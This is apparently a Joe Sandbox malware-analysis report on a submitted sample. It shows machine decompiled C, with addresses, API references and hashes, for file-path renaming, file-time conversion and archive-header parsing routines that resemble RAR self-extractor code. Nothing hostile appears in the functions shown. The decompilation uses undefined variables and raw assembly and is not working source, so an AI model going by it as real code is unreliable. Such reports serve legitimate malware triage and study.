Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: b928f2c6a23dc19f4d006f6cf2730a919c9bc983a2c3c4859bd6e947d2e51434
Instruction ID: 95df86900f9a79bf6ac362e534a0f71ee368e717d27252785c95412ab813f520
Opcode Fuzzy Hash: b928f2c6a23dc19f4d006f6cf2730a919c9bc983a2c3c4859bd6e947d2e51434
Instruction Fuzzy Hash: 65713871A00219AFDF14DFA4C895DAEBBF9FF48710B1441A9E516E72A0CB34AE41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00B69382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00B69382() {
				void* _t32;
				short _t33;
				long _t35;
				void* _t40;
				short _t42;
				void* _t66;
				intOrPtr _t69;
				void* _t76;
				intOrPtr _t79;
				void* _t81;
				WCHAR* _t82;
				void* _t84;
				void* _t86;

				E00B7EB78(0xb928b1, _t84);
				E00B7EC50(0x503c);
				_t82 =  *(_t84 + 8);
				_t32 = _t84 - 0x4048;
				__imp__GetLongPathNameW(_t82, _t32, 0x800, _t76, _t81, _t66);
				if(_t32 == 0 || _t32 >= 0x800) {
					L20:
					_t33 = 0;
					__eflags = 0;
				} else {
					_t35 = GetShortPathNameW(_t82, _t84 - 0x5048, 0x800);
					if(_t35 == 0) {
						goto L20;
					} else {
						_t91 = _t35 - 0x800;
						if(_t35 >= 0x800) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t84 - 0x10)) = E00B6C29A(_t91, _t84 - 0x4048);
							_t78 = E00B6C29A(_t91, _t84 - 0x5048);
							_t69 = 0;
							if( *_t39 == 0) {
								goto L20;
							} else {
								_t40 = E00B71FBB( *((intOrPtr*)(_t84 - 0x10)), _t78);
								_t93 = _t40;
								if(_t40 == 0) {
									goto L20;
								} else {
									_t42 = E00B71FBB(E00B6C29A(_t93, _t82), _t78);
									if(_t42 != 0) {
										goto L20;
									} else {
										 *(_t84 - 0x1010) = _t42;
										_t79 = 0;
										while(1) {
											_t95 = _t42;
											if(_t42 != 0) {
												break;
											}
											E00B70602(_t84 - 0x1010, _t82, 0x800);
											E00B64092(E00B6C29A(_t95, _t84 - 0x1010), 0x800, L"rtmp%d", _t79);
											_t86 = _t86 + 0x10;
											if(E00B6A231(_t84 - 0x1010) == 0) {
												_t42 =  *(_t84 - 0x1010);
											} else {
												_t42 = 0;
												 *(_t84 - 0x1010) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t98 = _t42;
												if(_t42 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E00B70602(_t84 - 0x3048, _t82, 0x800);
										_push(0x800);
										E00B6C310(_t98, _t84 - 0x3048,  *((intOrPtr*)(_t84 - 0x10)));
										if(MoveFileW(_t84 - 0x3048, _t84 - 0x1010) == 0) {
											goto L20;
										} else {
											E00B69556(_t84 - 0x2048);
											 *((intOrPtr*)(_t84 - 4)) = _t69;
											if(E00B6A231(_t82) == 0) {
												_t69 = E00B6966E(_t84 - 0x2048, _t82, 0x12);
											}
											MoveFileW(_t84 - 0x1010, _t84 - 0x3048);
											if(_t69 != 0) {
												E00B69620(_t84 - 0x2048);
												E00B6974E(_t84 - 0x2048);
											}
											E00B6959A(_t84 - 0x2048);
											_t33 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
				return _t33;
			}

0x00b69387
0x00b69391
0x00b69398
0x00b6939b
0x00b693aa
0x00b693b2
0x00b69543
0x00b69543
0x00b69543
0x00b693c0
0x00b693c9
0x00b693d1
0x00000000
0x00b693d7
0x00b693d7
0x00b693d9
0x00000000
0x00b693df
0x00b693eb
0x00b693fa
0x00b693fc
0x00b69401
0x00000000
0x00b69407
0x00b6940b
0x00b69410
0x00b69412
0x00000000
0x00b69418
0x00b69420
0x00b69427
0x00000000
0x00b6942d
0x00b6942d
0x00b69434
0x00b69436
0x00b69436
0x00b69439
0x00000000
0x00000000
0x00b69448
0x00b69465
0x00b6946a
0x00b6947b
0x00b69488
0x00b6947d
0x00b6947d
0x00b6947f
0x00b6947f
0x00b6948f
0x00b69498
0x00000000
0x00b6949a
0x00b6949a
0x00b6949d
0x00000000
0x00000000
0x00000000
0x00000000
0x00b6949d
0x00000000
0x00b69498
0x00b694b1
0x00b694b6
0x00b694c1
0x00b694dc
0x00000000
0x00b694de
0x00b694e4
0x00b694ea
0x00b694f4
0x00b69504
0x00b69504
0x00b69514
0x00b6951c
0x00b69524
0x00b6952f
0x00b6952f
0x00b6953a
0x00b6953f
0x00b6953f
0x00b694dc
0x00b69427
0x00b69412
0x00b69401
0x00b693d9
0x00b693d1
0x00b69545
0x00b6954b
0x00b69553

APIs

__EH_prolog.LIBCMT ref: 00B69387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00B693AA
GetShortPathNameW.KERNEL32 ref: 00B693C9

Part of subcall function 00B6C29A: _wcslen.LIBCMT ref: 00B6C2A2

Part of subcall function 00B71FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00B6C116,00000000,.exe,?,?,00000800,?,?,?,00B78E3C), ref: 00B71FD1

_swprintf.LIBCMT ref: 00B69465

Part of subcall function 00B64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B640A5

MoveFileW.KERNEL32(?,?), ref: 00B694D4
MoveFileW.KERNEL32(?,?), ref: 00B69514

Strings

rtmp%d, xrefs: 00B6944E

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: b8e53f89b1c7f461f7ba84f1ef7fc4ab832ac3e4b1a5c73d5af993e29420fae2
Instruction ID: 1289899860a5034e305466b3108c0e199af6191fb350082f5e002b5e650e4cad
Opcode Fuzzy Hash: b8e53f89b1c7f461f7ba84f1ef7fc4ab832ac3e4b1a5c73d5af993e29420fae2
Instruction Fuzzy Hash: E1415572900258A6DF21EB60CD55EEE73FCEF55740F0088E5B65AE3151EB3C8B898B64

Uniqueness

Uniqueness Score: -1.00%

Function 00B71218 Relevance: 12.1, APIs: 8, Instructions: 125
timeCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00B71218(intOrPtr* __ecx, long __edx, void* __ebp, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				intOrPtr* _v68;
				struct _FILETIME _v76;
				intOrPtr _v80;
				signed int _t78;
				long _t82;
				signed int _t87;
				signed int _t92;
				void* _t93;
				long _t94;
				signed int _t96;
				intOrPtr* _t97;
				intOrPtr* _t98;
				signed int* _t99;
				void* _t100;
				signed int _t101;

				_t100 = __ebp;
				_t94 = __edx;
				_t97 = __ecx;
				_v68 = __ecx;
				_v80 = E00B7F1E0( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76.dwLowDateTime = _t94;
				if(E00B6B146() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
					SystemTimeToFileTime( &_v16,  &_v76);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebx");
					asm("adc ecx, ebx");
					_v76.dwLowDateTime = 0 - _v56.dwLowDateTime + _v76.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebx");
					_v76.dwHighDateTime = _v76.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v76);
				}
				_push(_t100);
				FileTimeToSystemTime( &_v76,  &_v48);
				_t99 = _a4;
				_t92 = _v48.wDay & 0x0000ffff;
				_t101 = _v48.wMonth & 0x0000ffff;
				_t95 = _v48.wYear & 0x0000ffff;
				_t99[3] = _v48.wHour & 0x0000ffff;
				_t87 = _t92 - 1;
				_t99[4] = _v48.wMinute & 0x0000ffff;
				_t99[5] = _v48.wSecond & 0x0000ffff;
				_t99[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t99 = _v48.wYear & 0x0000ffff;
				_t99[1] = _t101;
				_t99[2] = _t92;
				_t99[8] = _t87;
				_v76.dwLowDateTime = 1;
				if(_t101 > 1) {
					_t96 = _t87;
					_t98 = 0xb9e1a8;
					_t93 = 4;
					while(1) {
						_t87 = _t96;
						if(_t93 > 0x30) {
							break;
						}
						_t93 = _t93 + 4;
						_t87 =  *_t98 + _t96;
						_t82 = _v76.dwLowDateTime + 1;
						_t99[8] = _t87;
						_t98 = _t98 + 4;
						_v76.dwLowDateTime = _t82;
						_t96 = _t87;
						if(_t82 < _t101) {
							continue;
						}
						break;
					}
					_t97 = _v68;
					_t95 = _v48.wYear & 0x0000ffff;
				}
				if(_t101 > 2 && E00B713A4(_t95) != 0) {
					_t99[8] = _t87 + 1;
				}
				_t78 = E00B7F250( *_t97,  *((intOrPtr*)(_t97 + 4)), 0x3b9aca00, 0);
				_t99[6] = _t78;
				return _t78;
			}

0x00b71218
0x00b71218
0x00b7121e
0x00b71225
0x00b71233
0x00b71237
0x00b71245
0x00b71263
0x00b71274
0x00b71284
0x00b71294
0x00b712a6
0x00b712ae
0x00b712b4
0x00b712ba
0x00b712be
0x00b712c0
0x00b71247
0x00b71251
0x00b71251
0x00b712c4
0x00b712cf
0x00b712d5
0x00b712de
0x00b712e3
0x00b712e8
0x00b712ed
0x00b712f5
0x00b712f8
0x00b71300
0x00b71308
0x00b7130e
0x00b71310
0x00b71313
0x00b71316
0x00b71319
0x00b7131f
0x00b71323
0x00b71325
0x00b7132a
0x00b7132b
0x00b7132b
0x00b71330
0x00000000
0x00000000
0x00b71334
0x00b7133b
0x00b7133d
0x00b7133e
0x00b71341
0x00b71344
0x00b71348
0x00b7134c
0x00000000
0x00000000
0x00000000
0x00b7134c
0x00b7134e
0x00b71352
0x00b71352
0x00b7135b
0x00b7136a
0x00b7136a
0x00b71379
0x00b7137f
0x00b71387

APIs

__aulldiv.LIBCMT ref: 00B7122E

Part of subcall function 00B6B146: GetVersionExW.KERNEL32(?), ref: 00B6B16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00B71251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00B71263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B71274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B71284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B71294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00B712CF
__aullrem.LIBCMT ref: 00B71379

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: f987961ae0dd8aac9c11c0be9b767c06ac0cb051f0d3c14b1c2771b89e278efb
Instruction ID: cf08ae6efefccc846c739c22221e88942e65a45869772db3e942edd5f89248c8
Opcode Fuzzy Hash: f987961ae0dd8aac9c11c0be9b767c06ac0cb051f0d3c14b1c2771b89e278efb
Instruction Fuzzy Hash: BB4107B1508305AFC710DF69C88496BBBE9FB88714F00892EF5AAD2210E734E649CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00B62210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00B62210(intOrPtr __ecx, signed int __edx, signed char _a3, signed char _a4, signed int _a5, signed int _a6, signed int _a7, signed char _a8, intOrPtr _a12, signed char _a16, intOrPtr _a20, char _a28, char _a36, char _a48, char _a52, char _a160, char _a172, intOrPtr _a8368, intOrPtr _a8372, intOrPtr _a8376) {
				char _v4;
				signed char _v5;
				char _v12;
				char _v16;
				signed char _t135;
				char _t138;
				signed int _t140;
				unsigned int _t141;
				signed int _t145;
				signed int _t162;
				signed int _t165;
				signed int _t176;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed int _t183;
				signed int _t186;
				signed int _t188;
				signed int _t189;
				signed char _t221;
				signed char _t234;
				signed int _t235;
				signed int _t237;
				intOrPtr _t240;
				signed char _t244;
				intOrPtr _t247;
				signed char _t248;
				signed char _t263;
				signed int _t264;
				signed int _t266;
				intOrPtr _t273;
				intOrPtr _t276;
				intOrPtr _t279;
				intOrPtr _t306;
				intOrPtr _t311;
				signed int _t313;
				intOrPtr _t315;
				signed char _t318;
				char _t319;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				void* _t325;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				intOrPtr* _t334;
				signed int _t337;
				signed int _t338;
				intOrPtr _t340;
				void* _t341;
				signed int _t345;
				signed int _t348;
				signed int _t361;

				_t313 = __edx;
				E00B7EC50(0x20ac);
				_t315 = _a8368;
				_a12 = __ecx;
				_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _a8372;
				if(_t135 <  *(_t315 + 0x1c)) {
					L96:
					return _t135;
				}
				 *(_t315 + 0x1c) = _t135;
				if(_a8372 >= 2) {
					_t240 = _a8376;
					while(1) {
						_t135 = E00B6CCFB();
						_t244 = _t135;
						_t345 = _t313;
						if(_t345 < 0 || _t345 <= 0 && _t244 == 0) {
							break;
						}
						_t318 =  *(_t315 + 0x1c);
						_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _t318;
						if(_t135 == 0) {
							break;
						}
						_t348 = _t313;
						if(_t348 > 0 || _t348 >= 0 && _t244 > _t135) {
							break;
						} else {
							_a8 = _t318 + _t244;
							_t138 = E00B6CCFB();
							_t337 = _t313;
							_t319 = _t138;
							_t313 = _a8;
							_t247 = _t313 -  *(_t315 + 0x1c);
							_a20 = _t247;
							if( *((intOrPtr*)(_t240 + 4)) == 1 && _t319 == 1 && _t337 == 0) {
								 *((char*)(_t240 + 0x1e)) = _t138;
								_t234 = E00B6CCFB();
								_a16 = _t234;
								if((_t234 & 0x00000001) != 0) {
									_t237 = E00B6CCFB();
									if((_t237 | _t313) != 0) {
										_t311 = _a12;
										asm("adc ecx, edx");
										 *((intOrPtr*)(_t240 + 0x20)) = _t237 +  *((intOrPtr*)(_t311 + 0x6cb8));
										 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)(_t311 + 0x6cbc));
									}
									_t234 = _a16;
								}
								if((_t234 & 0x00000002) != 0) {
									_t235 = E00B6CCFB();
									if((_t235 | _t313) != 0) {
										_t306 = _a12;
										asm("adc ecx, edx");
										 *((intOrPtr*)(_t240 + 0x30)) = _t235 +  *((intOrPtr*)(_t306 + 0x6cb8));
										 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)(_t306 + 0x6cbc));
									}
								}
								_t247 = _a20;
								_t313 = _a8;
							}
							if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
								_t361 = _t337;
								if(_t361 > 0 || _t361 >= 0 && _t319 > 7) {
									goto L94;
								} else {
									_t320 = _t319 - 1;
									if(_t320 == 0) {
										_t140 = E00B6CCFB();
										__eflags = _t140;
										if(_t140 == 0) {
											_t141 = E00B6CCFB();
											 *(_t240 + 0x10c1) = _t141 & 0x00000001;
											 *(_t240 + 0x10ca) = _t141 >> 0x00000001 & 0x00000001;
											_t145 = E00B6CBAF(_t315) & 0x000000ff;
											 *(_t240 + 0x10ec) = _t145;
											__eflags = _t145 - 0x18;
											if(_t145 > 0x18) {
												E00B64092( &_a28, 0x14, L"xc%u", _t145);
												_t341 = _t341 + 0x10;
												E00B6403D(_a12, _t240 + 0x28,  &_a28);
											}
											E00B6CC5D(_t315, _t240 + 0x10a1, 0x10);
											E00B6CC5D(_t315, _t240 + 0x10b1, 0x10);
											__eflags =  *(_t240 + 0x10c1);
											if( *(_t240 + 0x10c1) != 0) {
												_t321 = _t240 + 0x10c2;
												E00B6CC5D(_t315, _t321, 8);
												E00B6CC5D(_t315,  &_a16, 4);
												E00B70016( &_a52);
												_push(8);
												_push(_t321);
												_push( &_a48);
												E00B7005C();
												_push( &_v4);
												E00B6FF33( &_a36);
												_t162 = E00B80C4A( &_v16,  &_v12, 4);
												_t341 = _t341 + 0xc;
												asm("sbb al, al");
												__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
												 *(_t240 + 0x10c1) =  ~_t162 + 1;
												if( *((intOrPtr*)(_t240 + 4)) == 3) {
													_t165 = E00B80C4A(_t321, 0xb936a8, 8);
													_t341 = _t341 + 0xc;
													__eflags = _t165;
													if(_t165 == 0) {
														 *(_t240 + 0x10c1) = _t165;
													}
												}
											}
											 *((char*)(_t240 + 0x10a0)) = 1;
											 *((intOrPtr*)(_t240 + 0x109c)) = 5;
											 *((char*)(_t240 + 0x109b)) = 1;
										} else {
											E00B64092( &_a28, 0x14, L"x%u", _t140);
											_t341 = _t341 + 0x10;
											E00B6403D(_a12, _t240 + 0x28,  &_a28);
										}
										goto L94;
									}
									_t322 = _t320 - 1;
									if(_t322 == 0) {
										_t176 = E00B6CCFB();
										__eflags = _t176;
										if(_t176 != 0) {
											goto L94;
										}
										_push(0x20);
										 *((intOrPtr*)(_t240 + 0x1070)) = 3;
										_push(_t240 + 0x1074);
										L37:
										E00B6CC5D(_t315);
										goto L94;
									}
									_t323 = _t322 - 1;
									if(_t323 == 0) {
										__eflags = _t247 - 5;
										if(_t247 < 5) {
											goto L94;
										}
										_t179 = E00B6CCFB();
										_a3 = _t179;
										_t180 = _t179 & 0x00000001;
										_t263 = _a3;
										_a4 = _t180;
										_t313 = _t263 & 0x00000002;
										__eflags = _t313;
										_a5 = _t313;
										if(_t313 != 0) {
											_t279 = _t315;
											__eflags = _t180;
											if(__eflags == 0) {
												E00B715BB(_t240 + 0x1040, E00B6CC3D(_t279, __eflags), _t313);
											} else {
												E00B7158F(_t240 + 0x1040, E00B6CBFB(_t279), 0);
											}
											_t263 = _a3;
											_t180 = _a4;
										}
										_t264 = _t263 & 0x00000004;
										__eflags = _t264;
										_a6 = _t264;
										if(_t264 != 0) {
											_t326 = _t240 + 0x1048;
											_t276 = _t315;
											__eflags = _t180;
											if(__eflags == 0) {
												E00B715BB(_t326, E00B6CC3D(_t276, __eflags), _t313);
											} else {
												E00B7158F(_t326, E00B6CBFB(_t276), 0);
											}
										}
										_t181 = _a3;
										_t266 = _t181 & 0x00000008;
										__eflags = _t266;
										_a7 = _t266;
										if(_t266 == 0) {
											__eflags = _a4;
											if(_a4 == 0) {
												goto L94;
											}
											goto L72;
										} else {
											__eflags = _a4;
											_t325 = _t240 + 0x1050;
											_t273 = _t315;
											if(__eflags == 0) {
												E00B715BB(_t325, E00B6CC3D(_t273, __eflags), _t313);
												goto L94;
											}
											E00B7158F(_t325, E00B6CBFB(_t273), 0);
											_t181 = _v5;
											L72:
											__eflags = _t181 & 0x00000010;
											if((_t181 & 0x00000010) != 0) {
												__eflags = _a5;
												if(_a5 == 0) {
													_t338 = 0x3fffffff;
													_t324 = 0x3b9aca00;
												} else {
													_t188 = E00B6CBFB(_t315);
													_t338 = 0x3fffffff;
													_t324 = 0x3b9aca00;
													_t189 = _t188 & 0x3fffffff;
													__eflags = _t189 - 0x3b9aca00;
													if(_t189 < 0x3b9aca00) {
														E00B71208(_t240 + 0x1040, _t189, 0);
													}
												}
												__eflags = _a6;
												if(_a6 != 0) {
													_t186 = E00B6CBFB(_t315) & _t338;
													__eflags = _t186 - _t324;
													if(_t186 < _t324) {
														E00B71208(_t240 + 0x1048, _t186, 0);
													}
												}
												__eflags = _a7;
												if(_a7 != 0) {
													_t183 = E00B6CBFB(_t315) & _t338;
													__eflags = _t183 - _t324;
													if(_t183 < _t324) {
														E00B71208(_t240 + 0x1050, _t183, 0);
													}
												}
											}
											goto L94;
										}
									}
									_t327 = _t323 - 1;
									if(_t327 == 0) {
										__eflags = _t247 - 1;
										if(_t247 >= 1) {
											E00B6CCFB();
											__eflags = E00B6CCFB();
											if(__eflags != 0) {
												 *((char*)(_t240 + 0x10f3)) = 1;
												E00B64092( &_a28, 0x14, L";%u", _t204);
												_t341 = _t341 + 0x10;
												E00B705DA(__eflags, _t240 + 0x28,  &_a28, 0x800);
											}
										}
										goto L94;
									}
									_t328 = _t327 - 1;
									if(_t328 == 0) {
										 *((intOrPtr*)(_t240 + 0x1100)) = E00B6CCFB();
										 *(_t240 + 0x2104) = E00B6CCFB() & 0x00000001;
										_t329 = E00B6CCFB();
										_a172 = 0;
										__eflags = _t329 - 0x1fff;
										if(_t329 < 0x1fff) {
											E00B6CC5D(_t315,  &_a172, _t329);
											 *((char*)(_t341 + _t329 + 0xbc)) = 0;
										}
										E00B6C335( &_a172,  &_a172, 0x2000);
										_push(0x800);
										_push(_t240 + 0x1104);
										_push( &_a160);
										E00B71C3B();
										goto L94;
									}
									_t330 = _t328 - 1;
									if(_t330 == 0) {
										_t221 = E00B6CCFB();
										_a16 = _t221;
										_t339 = _t240 + 0x2108;
										 *(_t240 + 0x2106) = _t221 >> 0x00000002 & 0x00000001;
										 *(_t240 + 0x2107) = _t221 >> 0x00000003 & 0x00000001;
										 *((char*)(_t240 + 0x2208)) = 0;
										 *((char*)(_t240 + 0x2108)) = 0;
										__eflags = _t221 & 0x00000001;
										if((_t221 & 0x00000001) != 0) {
											_t332 = E00B6CCFB();
											__eflags = _t332 - 0xff;
											if(_t332 >= 0xff) {
												_t332 = 0xff;
											}
											E00B6CC5D(_t315, _t339, _t332);
											_t221 = _a8;
											 *((char*)(_t332 + _t240 + 0x2108)) = 0;
										}
										__eflags = _t221 & 0x00000002;
										if((_t221 & 0x00000002) != 0) {
											_t331 = E00B6CCFB();
											__eflags = _t331 - 0xff;
											if(_t331 >= 0xff) {
												_t331 = 0xff;
											}
											E00B6CC5D(_t315, _t240 + 0x2208, _t331);
											 *((char*)(_t331 + _t240 + 0x2208)) = 0;
										}
										__eflags =  *(_t240 + 0x2106);
										if( *(_t240 + 0x2106) != 0) {
											 *((intOrPtr*)(_t240 + 0x2308)) = E00B6CCFB();
										}
										__eflags =  *(_t240 + 0x2107);
										if( *(_t240 + 0x2107) != 0) {
											 *((intOrPtr*)(_t240 + 0x230c)) = E00B6CCFB();
										}
										 *((char*)(_t240 + 0x2105)) = 1;
										goto L94;
									}
									if(_t330 != 1) {
										goto L94;
									}
									_t340 = _t247;
									if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t315 + 0x18)) - _t313 == 1) {
										_t340 = _t247 + 1;
									}
									_t334 = _t240 + 0x1028;
									E00B620BD(_t334, _t340);
									_push(_t340);
									_push( *_t334);
									goto L37;
								}
							} else {
								L94:
								_t248 = _a8;
								 *(_t315 + 0x1c) = _t248;
								_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _t248;
								if(_t135 >= 2) {
									continue;
								}
								break;
							}
						}
					}
				}
			}

0x00b62210
0x00b62215
0x00b6221b
0x00b62222
0x00b62229
0x00b62233
0x00b62862
0x00b62868
0x00b62868
0x00b62241
0x00b62244
0x00b6224b
0x00b62254
0x00b62256
0x00b6225b
0x00b6225d
0x00b6225f
0x00000000
0x00000000
0x00b62272
0x00b62275
0x00b62277
0x00000000
0x00000000
0x00b6227d
0x00b6227f
0x00000000
0x00b6228f
0x00b62294
0x00b62298
0x00b6229d
0x00b6229f
0x00b622a1
0x00b622a7
0x00b622ae
0x00b622b2
0x00b622bf
0x00b622c2
0x00b622c7
0x00b622cd
0x00b622d1
0x00b622da
0x00b622dc
0x00b622ec
0x00b622ee
0x00b622f1
0x00b622f1
0x00b622f4
0x00b622f4
0x00b622fa
0x00b622fe
0x00b62307
0x00b62309
0x00b62319
0x00b6231b
0x00b6231e
0x00b6231e
0x00b62307
0x00b62321
0x00b62325
0x00b62325
0x00b6232d
0x00b62339
0x00b6233b
0x00000000
0x00b6234c
0x00b6234c
0x00b6234f
0x00b626f3
0x00b626f8
0x00b626fa
0x00b6272a
0x00b62738
0x00b62740
0x00b6274b
0x00b6274e
0x00b62754
0x00b62757
0x00b62766
0x00b62773
0x00b6277b
0x00b6277b
0x00b6278b
0x00b6279b
0x00b627a0
0x00b627a7
0x00b627af
0x00b627b8
0x00b627c6
0x00b627d0
0x00b627d5
0x00b627d7
0x00b627dc
0x00b627dd
0x00b627e6
0x00b627ec
0x00b627fd
0x00b62802
0x00b62807
0x00b6280b
0x00b6280f
0x00b62815
0x00b6281f
0x00b62824
0x00b62827
0x00b62829
0x00b6282b
0x00b6282b
0x00b62829
0x00b62815
0x00b62831
0x00b62838
0x00b62842
0x00b626fc
0x00b62709
0x00b62716
0x00b6271e
0x00b6271e
0x00000000
0x00b626fa
0x00b62355
0x00b62358
0x00b626cc
0x00b626d1
0x00b626d3
0x00000000
0x00000000
0x00b626d9
0x00b626e1
0x00b626eb
0x00b623ad
0x00b623af
0x00000000
0x00b623af
0x00b6235e
0x00b62361
0x00b62556
0x00b62559
0x00000000
0x00000000
0x00b62561
0x00b62566
0x00b6256a
0x00b6256c
0x00b62572
0x00b62576
0x00b62576
0x00b62579
0x00b6257d
0x00b6257f
0x00b62581
0x00b62583
0x00b625a7
0x00b62585
0x00b62593
0x00b62593
0x00b625ac
0x00b625b0
0x00b625b0
0x00b625b4
0x00b625b4
0x00b625b7
0x00b625bb
0x00b625bd
0x00b625c3
0x00b625c5
0x00b625c7
0x00b625e3
0x00b625c9
0x00b625d3
0x00b625d3
0x00b625c7
0x00b625e8
0x00b625ee
0x00b625ee
0x00b625f1
0x00b625f5
0x00b6262e
0x00b62633
0x00000000
0x00000000
0x00000000
0x00b625f7
0x00b625f7
0x00b625fc
0x00b62602
0x00b62604
0x00b62624
0x00000000
0x00b62624
0x00b62610
0x00b62615
0x00b62639
0x00b62639
0x00b6263b
0x00b62641
0x00b62646
0x00b6266f
0x00b62674
0x00b62648
0x00b6264a
0x00b6264f
0x00b62654
0x00b62659
0x00b6265b
0x00b6265d
0x00b62668
0x00b62668
0x00b6265d
0x00b62679
0x00b6267e
0x00b62687
0x00b62689
0x00b6268b
0x00b62696
0x00b62696
0x00b6268b
0x00b6269b
0x00b626a0
0x00b626ad
0x00b626af
0x00b626b1
0x00b626c0
0x00b626c0
0x00b626b1
0x00b626a0
0x00000000
0x00b6263b
0x00b625f5
0x00b62367
0x00b6236a
0x00b62503
0x00b62506
0x00b6250e
0x00b6251a
0x00b6251c
0x00b6252c
0x00b62536
0x00b6253b
0x00b6254c
0x00b6254c
0x00b6251c
0x00000000
0x00b62506
0x00b62370
0x00b62373
0x00b6248e
0x00b6249d
0x00b624a8
0x00b624aa
0x00b624b2
0x00b624b8
0x00b624c5
0x00b624ca
0x00b624ca
0x00b624e0
0x00b624e5
0x00b624f0
0x00b624f8
0x00b624f9
0x00000000
0x00b624f9
0x00b62379
0x00b6237c
0x00b623bb
0x00b623c2
0x00b623c9
0x00b623d2
0x00b623e0
0x00b623e6
0x00b623ed
0x00b623f1
0x00b623f3
0x00b623fc
0x00b62403
0x00b62405
0x00b62407
0x00b62407
0x00b6240d
0x00b62412
0x00b62416
0x00b62416
0x00b6241e
0x00b62420
0x00b62429
0x00b62430
0x00b62432
0x00b62434
0x00b62434
0x00b62440
0x00b62445
0x00b62445
0x00b6244d
0x00b62454
0x00b6245d
0x00b6245d
0x00b62463
0x00b6246a
0x00b62473
0x00b62473
0x00b62479
0x00000000
0x00b62479
0x00b62381
0x00000000
0x00000000
0x00b6238b
0x00b6238d
